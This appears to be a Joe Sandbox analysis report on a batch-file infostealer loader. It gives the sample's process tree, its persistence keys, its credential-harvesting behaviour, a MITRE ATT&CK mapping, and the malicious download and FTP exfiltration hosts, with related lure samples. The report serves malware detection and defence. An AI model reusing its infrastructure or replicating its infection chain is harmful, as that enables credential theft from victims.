Source: Yara match | File source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2037584251.0000000026FA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2933710309.0000000022764000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1885700149.0000000029CE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: xrbjyllC.pif PID: 4544, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: xrbjyllC.pif PID: 4108, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: xrbjyllC.pif PID: 6568, type: MEMORYSTR

                  Remote Access Functionality

MITRE ATT&CK Matrix (techniques matched for this sample, grouped by tactic; the number after each technique is the count badge shown in the report's matrix)

• Reconnaissance: no matched techniques
• Resource Development: Scripting (1)
• Initial Access: Valid Accounts (1)
• Execution: Windows Management Instrumentation (121); Native API (2); Shared Modules (1); Command and Scripting Interpreter (2)
• Persistence: Scripting (1); DLL Side-Loading (1); Valid Accounts (1); Registry Run Keys / Startup Folder (11)
• Privilege Escalation: DLL Side-Loading (1); Valid Accounts (1); Access Token Manipulation (1); Process Injection (311); Registry Run Keys / Startup Folder (11)
• Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (2); Software Packing (3); Timestomp (1); DLL Side-Loading (1); Masquerading (211); Valid Accounts (1); Access Token Manipulation (1); Virtualization/Sandbox Evasion (151); Process Injection (311); Hidden Files and Directories (1)
• Credential Access: OS Credential Dumping (2); Input Capture (21); Credentials in Registry (1)
• Discovery: System Time Discovery (2); System Network Connections Discovery (1); File and Directory Discovery (2); System Information Discovery (47); Query Registry (1); Security Software Discovery (361); Virtualization/Sandbox Evasion (151); Process Discovery (2); Application Window Discovery (1); System Network Configuration Discovery (1)
• Lateral Movement: no matched techniques
• Collection: Archive Collected Data (11); Data from Local System (2); Email Collection (1); Input Capture (21); Clipboard Data (1)
• Command and Control: Ingress Tool Transfer (1); Encrypted Channel (11); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (123)
• Exfiltration: Exfiltration Over Alternative Protocol (1)
• Impact: no matched techniques
Behavior Graph (ID: 1545203; Sample: z1Transaction_ID_REF2418_cmd.bat; Startdate: 30/10/2024; Architecture: WINDOWS; Score: 100)

Start node: contacts himalayastrek.com, ftp.haliza.com.my and 2 other IPs or domains; signatures: Suricata IDS alerts for network traffic, Found malware configuration, Malicious sample detected (through community Yara rule), 14 other signatures. Process tree (node numbers are the graph's node ids):

• cmd.exe (node 9)
  • x.exe (node 18): contacts himalayastrek.com 50.116.93.185, ports 443, 49730, 49731 (UNIFIEDLAYER-AS-1US, United States); drops C:\Users\Public\Libraries\xrbjyllC.pif (PE32) and C:\Users\Public\Cllyjbrx.url (MS); signatures: Multi AV Scanner detection for dropped file, Creates multiple autostart registry keys, Drops PE files with a suspicious file extension, 4 other signatures
    • xrbjyllC.pif (node 31): contacts ftp.haliza.com.my 110.4.45.197, ports 21, 49733, 49734 (EXABYTES-AS-AP ExaBytes Network Sdn Bhd MY, Malaysia) and api.ipify.org 172.67.74.152, ports 443, 49732, 49740 (CLOUDFLARENETUS, United States); drops C:\Users\user\AppData\Roaming\...\sgxIb.exe (PE32); signatures: Detected unpacking (changes PE section rights), Detected unpacking (overwrites its own PE header), Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc), 5 other signatures
    • cmd.exe (node 36)
      • esentutl.exe (node 40): drops C:\Users\Public\alpha.pif (PE32); signatures: Drops PE files to the user root directory, Drops PE files with a suspicious file extension, Drops or copies cmd.exe with a different name (likely to bypass HIPS)
      • conhost.exe (node 44)
    • esentutl.exe (node 38): drops C:\Users\Public\Libraries\Cllyjbrx.PIF (PE32)
      • conhost.exe (node 46)
  • extrac32.exe (node 23): drops C:\Users\user\AppData\Local\Temp\x.exe (PE32)
  • conhost.exe (node 25)
• Cllyjbrx.PIF (node 11): signatures: Writes to foreign memory regions, Allocates memory in foreign processes, Sample uses process hollowing technique
  • xrbjyllC.pif (node 27): signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc), Tries to steal Mail credentials (via file / registry access), Tries to harvest and steal ftp login credentials, Tries to harvest and steal browser information (history, passwords, etc)
• Cllyjbrx.PIF (node 14): signature: Multi AV Scanner detection for dropped file
  • xrbjyllC.pif (node 29): signatures: Hides that the sample has been downloaded from the Internet (zone.identifier), Installs a global keyboard hook
• 2 other processes (node 16)

Source | Detection | Scanner | Label | Link
z1Transaction_ID_REF2418_cmd.bat | 24% | ReversingLabs | Win32.Trojan.Malcab |

Source | Detection | Scanner | Label | Link
C:\Users\Public\Libraries\Cllyjbrx.PIF | 32% | ReversingLabs | Win32.Infostealer.Tinba |
C:\Users\Public\Libraries\xrbjyllC.pif | 3% | ReversingLabs | |
C:\Users\Public\alpha.pif | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\x.exe | 32% | ReversingLabs | Win32.Infostealer.Tinba |
C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe | 3% | ReversingLabs | |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
https://api.ipify.org/ | 0% | URL Reputation | safe |
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | 0% | URL Reputation | safe |
https://api.ipify.org | 0% | URL Reputation | safe |
https://sectigo.com/CPS0 | 0% | URL Reputation | safe |
https://account.dyn.com/ | 0% | URL Reputation | safe |
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | URL Reputation | safe |
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe |
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | 0% | URL Reputation | safe |
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | 0% | URL Reputation | safe |
https://api.ipify.org/t | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | unknown
himalayastrek.com | 50.116.93.185 | true | true | | unknown
api.ipify.org | 172.67.74.152 | true | true | | unknown
ftp.haliza.com.my | 110.4.45.197 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | true | URL Reputation: safe | unknown
https://himalayastrek.com/origins/233_Cllyjbrxmng | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.ipify.org | xrbjyllC.pif, 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885700149.0000000029C91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.0000000022711000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://sectigo.com/CPS0 | x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://account.dyn.com/ | xrbjyllC.pif, 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ftp.haliza.com.my | xrbjyllC.pif, 00000009.00000002.1885700149.0000000029D6E000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026FED000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.00000000227AD000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://ocsp.sectigo.com0 | x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://himalayastrek.com/origins/233_CllyjbrxmngHA | Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000061C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                                https://himalayastrek.com/-x.exe, 00000003.00000002.1721962152.000000000085E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://himalayastrek.com/origins/233_CllyjbrxmngyCllyjbrx.PIF, 0000000A.00000002.1827777323.000000000064E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://himalayastrek.com/origins/233_CllyjbrxmngZCllyjbrx.PIF, 0000000A.00000002.1827777323.000000000061C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://api.ipify.org/txrbjyllC.pif, 00000009.00000002.1885700149.0000000029C91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.0000000022711000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://himalayastrek.com:443/origins/233_CllyjbrxmngPx.exe, 00000003.00000002.1721962152.000000000089F000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 00000010.00000002.1997779443.00000000008BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namexrbjyllC.pif, 00000009.00000002.1885700149.0000000029C91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.0000000022711000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.pmail.comx.exe, x.exe, 00000003.00000002.1753574596.0000000021905000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1759764048.000000007FE2F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1752975519.0000000021700000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FBDF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668442812.0000000003028000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1721962152.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1723790812.000000000302C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000000.1719344100.0000000000416000.00000002.00000001.01000000.00000007.sdmp, xrbjyllC.pif, 0000000B.00000000.1826114660.0000000000416000.00000002.00000001.01000000.00000007.sdmp, sgxIb.exe, sgxIb.exe, 0000000D.00000002.1890633912.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, sgxIb.exe, 0000000D.00000000.1888350846.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, xrbjyllC.pif, 00000011.00000002.2937816421.0000000025B6E000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000000.1995988945.0000000000416000.00000002.00000001.01000000.00000007.sdmp, sgxIb.exe, 00000012.00000002.2055006675.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, sgxIb.exe, 00000012.00000000.2054308600.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, sgxIb.exe.9.dr, xrbjyllC.pif.3.drfalse
                                          unknown
                                          http://ocsp.sectigo.com0Cx.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpfalse
                                            unknown
                                            https://himalayastrek.com/Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000061C000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 00000010.00000002.1997779443.0000000000848000.00000004.00000020.00020000.00000000.sdmptrue
                                              unknown
                                              https://himalayastrek.com:443/origins/233_CllyjbrxmngCllyjbrx.PIF, 0000000A.00000002.1827777323.0000000000669000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
| 50.116.93.185 | himalayastrek.com | United States | US | 46606 | UNIFIEDLAYER-AS-1 | true |
| 110.4.45.197 | ftp.haliza.com.my | Malaysia | MY | 46015 | EXABYTES-AS-AP ExaBytes Network Sdn Bhd | true |
| 172.67.74.152 | api.ipify.org | United States | US | 13335 | CLOUDFLARENET | true |
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1545203
Start date and time: 2024-10-30 08:34:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 21s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: z1Transaction_ID_REF2418_cmd.bat
Detection: MAL
Classification: mal100.troj.spyw.evad.winBAT@25/11@3/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 172
• Number of non-executed functions: 84
Cookbook Comments:
• Found application associated with file extension: .bat
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200, 52.165.164.15, 13.85.23.206, 4.175.87.197
• Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: z1Transaction_ID_REF2418_cmd.bat
| Time | Type | Description |
| 03:34:57 | API Interceptor | 2x Sleep call for process: x.exe modified |
| 03:35:07 | API Interceptor | 395508x Sleep call for process: xrbjyllC.pif modified |
| 03:35:10 | API Interceptor | 2x Sleep call for process: Cllyjbrx.PIF modified |
| 07:35:01 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Cllyjbrx C:\Users\Public\Cllyjbrx.url |
| 07:35:10 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sgxIb C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe |
| 07:35:18 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Cllyjbrx C:\Users\Public\Cllyjbrx.url |
| 07:35:26 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sgxIb C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| 50.116.93.185 | z1SWIFT_MT103_Payment_552016_cmd.bat | malicious | DBatLoader, FormBook |  |
| 50.116.93.185 | Order Specifications for Materials.docx.vbs | malicious | DBatLoader, FormBook |  |
| 110.4.45.197 | z20SWIFT_MT103_Payment_552016_pdf.exe | malicious | AgentTesla, PureLog Stealer |  |
| 110.4.45.197 | Order Specifications for Materials.docx.exe | malicious | AgentTesla, PureLog Stealer |  |
| 110.4.45.197 | z14Employee_Contract_pdf.exe | malicious | AgentTesla |  |
| 110.4.45.197 | Order Specifications for Materials.docx.exe | malicious | AgentTesla |  |
| 110.4.45.197 | DHL_Shipment_Details_8th_October.pdf.exe | malicious | AgentTesla |  |
| 110.4.45.197 | z92BankPayment38_735.exe | malicious | AgentTesla |  |
| 110.4.45.197 | Bank Payment $38,735.exe | malicious | AgentTesla |  |
| 110.4.45.197 | rQuotation3200025006.exe | malicious | AgentTesla |  |
| 110.4.45.197 | z38PO_20248099-1_pdf.exe | malicious | AgentTesla |  |
| 110.4.45.197 | z64MT103_126021720924_pdf.exe | malicious | AgentTesla |  |
| 172.67.74.152 | 67065b4c84713_Javiles.exe | malicious | RDPWrap Tool | api.ipify.org/ |
| 172.67.74.152 | Yc9hcFC1ux.exe | malicious | Unknown | api.ipify.org/ |
| 172.67.74.152 | 4F08j2Rmd9.bin | malicious | Xmrig | api.ipify.org/ |
| 172.67.74.152 | y8tCHz7CwC.bin | malicious | Xmrig | api.ipify.org/ |
| 172.67.74.152 | file.exe | malicious | Unknown | api.ipify.org/ |
| 172.67.74.152 | file.exe | malicious | Unknown | api.ipify.org/ |
| 172.67.74.152 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | api.ipify.org/ |
| 172.67.74.152 | file.exe | malicious | RDPWrap Tool | api.ipify.org/ |
| 172.67.74.152 | Prismifyr-Install.exe | malicious | Node Stealer | api.ipify.org/ |
| 172.67.74.152 | 2zYP8qOYmJ.exe | malicious | Unknown | api.ipify.org/ |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| himalayastrek.com | z1SWIFT_MT103_Payment_552016_cmd.bat | malicious | DBatLoader, FormBook | 50.116.93.185 |
| himalayastrek.com | Order Specifications for Materials.docx.vbs | malicious | DBatLoader, FormBook | 50.116.93.185 |
| bg.microsoft.map.fastly.net | Orden de Compra.xlam.xlsx | malicious | Unknown | 199.232.214.172 |
| bg.microsoft.map.fastly.net | PO-004976.xls | malicious | Unknown | 199.232.210.172 |
| bg.microsoft.map.fastly.net | Order Pdf.exe | malicious | DBatLoader | 199.232.210.172 |
| bg.microsoft.map.fastly.net | https://trvelocity.petra-dee.org/index.php/campaigns/ao946pbrfq631/track-url/lk782m0eyna84/24e9f9ecc31181de7c43e9793836ee263a7fcd94%20%20office365_event_type%20alert | malicious | Unknown | 199.232.214.172 |
| bg.microsoft.map.fastly.net | cotizaci#U00f2n.xlam.xlsx | malicious | Unknown | 199.232.210.172 |
| bg.microsoft.map.fastly.net | DHL TRACKING.exe | malicious | FormBook | 199.232.210.172 |
| bg.microsoft.map.fastly.net | https://www.google.im/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s/creditodigitalelmo.com.br/solo/i2975ufuy18zkhauvhibzzxy/YWRzQGJldHdlZW4udXM= | malicious | HTMLPhisher | 199.232.214.172 |
| bg.microsoft.map.fastly.net | https://alcatrazpackages.com/elchapo.html | malicious | Unknown | 199.232.214.172 |
| bg.microsoft.map.fastly.net | completedfiles.....pdf | malicious | Unknown | 199.232.214.172 |
| bg.microsoft.map.fastly.net | https://docs.google.com/uc?export=download&id=1gucHUhrnC0jRDGAhRfRkCK8rYqf0o3cv | malicious | Unknown | 199.232.214.172 |
| ftp.haliza.com.my | z20SWIFT_MT103_Payment_552016_pdf.exe | malicious | AgentTesla, PureLog Stealer | 110.4.45.197 |
| ftp.haliza.com.my | Order Specifications for Materials.docx.exe | malicious | AgentTesla, PureLog Stealer | 110.4.45.197 |
| ftp.haliza.com.my | z14Employee_Contract_pdf.exe | malicious | AgentTesla | 110.4.45.197 |
| ftp.haliza.com.my | Order Specifications for Materials.docx.exe | malicious | AgentTesla | 110.4.45.197 |
| ftp.haliza.com.my | DHL_Shipment_Details_8th_October.pdf.exe | malicious | AgentTesla | 110.4.45.197 |
| ftp.haliza.com.my | z92BankPayment38_735.exe | malicious | AgentTesla | 110.4.45.197 |
| ftp.haliza.com.my | Bank Payment $38,735.exe | malicious | AgentTesla | 110.4.45.197 |
| ftp.haliza.com.my | rQuotation3200025006.exe | malicious | AgentTesla | 110.4.45.197 |
| ftp.haliza.com.my | z38PO_20248099-1_pdf.exe | malicious | AgentTesla | 110.4.45.197 |
| ftp.haliza.com.my | z64MT103_126021720924_pdf.exe | malicious | AgentTesla | 110.4.45.197 |
| api.ipify.org | Purchase Order PO61000016222.exe | malicious | AgentTesla | 104.26.12.205 |
| api.ipify.org | Statement JULY #U007e SEP 2024 USD 19,055.00.exe | malicious | AgentTesla | 172.67.74.152 |
| api.ipify.org | EVER ABILITY V66 PARTICULARS.pdf.exe | malicious | AgentTesla, PureLog Stealer | 104.26.13.205 |
| api.ipify.org | MV. NORDRHONE VSL's PARTICULARS.xlsx.exe | malicious | AgentTesla, PureLog Stealer | 104.26.13.205 |
| api.ipify.org | MUM - VESSEL'S PARTICULARS.pdf.exe | malicious | AgentTesla, PureLog Stealer | 104.26.13.205 |
| api.ipify.org | INVOICE.exe | malicious | AgentTesla, PureLog Stealer | 172.67.74.152 |
